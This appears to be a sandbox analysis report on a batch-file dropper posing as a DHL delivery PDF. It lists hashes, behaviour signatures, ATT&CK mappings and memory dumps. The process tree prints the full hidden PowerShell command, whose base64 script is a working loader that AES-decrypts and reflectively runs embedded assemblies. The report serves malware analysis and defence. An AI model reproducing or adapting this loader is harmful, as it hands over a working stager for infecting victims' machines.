e300cdc65dde1e6def171e9a88096f74efc7e6437fab37ad53e3cab5cfd81329

General

Target

awb_post_dhl_delivery_documents.pdf.bat
Size

64KB
MD5

5badf099818dadbd971715163ca64bd9
SHA1

6064c6a53bc49018a8e1d58349b5e02b6e8e41cf
SHA256

e300cdc65dde1e6def171e9a88096f74efc7e6437fab37ad53e3cab5cfd81329
SHA512

b043a6e4f5a260a29217252d3ed5f4a374a7a7dba2607e64ba0c4ab551e6c590602590efe1ff096ae67329a19bc6c6e3b6c2738fa9b1cc6cd797749c26850a36
SSDEEP

1536:g2bQApZkbmEKUgXEXzICKUnFB8Y+Rw1VG3VnlLKA1wW9EmV:g2bQAoHfzz1sJJKcumV

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2480	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2480	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2480	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1800 wrote to memory of 2008	1800	cmd.exe	32
PID 1800 wrote to memory of 2008	1800	cmd.exe	32
PID 1800 wrote to memory of 2008	1800	cmd.exe	32
PID 2008 wrote to memory of 2480	2008	cmd.exe	34
PID 2008 wrote to memory of 2480	2008	cmd.exe	34
PID 2008 wrote to memory of 2480	2008	cmd.exe	34

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\awb_post_dhl_delivery_documents.pdf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\awb_post_dhl_delivery_documents.pdf.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskYXZudm0gPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJGF2bnZtKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRhdm52bSIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRhdm52bSwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkYXZudm0iIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gZXlobGsoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2NDSmpWMlZOd0RuWFE1Nk9tZlVLU2pvNVFMZndIazUyVU01U3BkQXlwR1U9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ29qR2QzbnNoakFTNkZLZ1dZTzFnZFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gYXJjc3goJHBhcmFtX3Zhcil7CSRpanl6cD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkcmlrZHY9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkd2NyYXA9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkaWp5enAsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJHdjcmFwLkNvcHlUbygkcmlrZHYpOwkkd2NyYXAuRGlzcG9zZSgpOwkkaWp5enAuRGlzcG9zZSgpOwkkcmlrZHYuRGlzcG9zZSgpOwkkcmlrZHYuVG9BcnJheSgpO31mdW5jdGlvbiBzZXNydigkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHhjdXN2PVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJHp1bmNpPSR4Y3Vzdi5FbnRyeVBvaW50OwkkenVuY2kuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJGF2bnZtOyR6b2RwYj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJGF2bnZtKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeHNuIGluICR6b2RwYikgewlpZiAoJHhzbi5TdGFydHNXaXRoKCc6OiAnKSkJewkJJGp4bXpsPSR4c24uU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JGp4dWZ5PVtzdHJpbmdbXV0kanhtemwuU3BsaXQoJ1wnKTskemd5c3g9YXJjc3ggKGV5aGxrIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGp4dWZ5WzBdKSkpOyR3Ymljej1hcmNzeCAoZXlobGsgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkanh1ZnlbMV0pKSk7c2VzcnYgJHpneXN4ICRudWxsO3Nlc3J2ICR3YmljeiAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2480-6-0x000007FEF571E000-0x000007FEF571F000-memory.dmp

Filesize
4KB

Download
memory/2480-8-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

Filesize
9.6MB

Download
memory/2480-7-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

Filesize
2.9MB

Download
memory/2480-9-0x0000000001EB0000-0x0000000001EB8000-memory.dmp

Filesize
32KB

Download
memory/2480-12-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

Filesize
9.6MB

Download
memory/2480-11-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

Filesize
9.6MB

Download
memory/2480-10-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

Filesize
9.6MB

Download
memory/2480-13-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

Filesize
9.6MB

Download
memory/2480-14-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing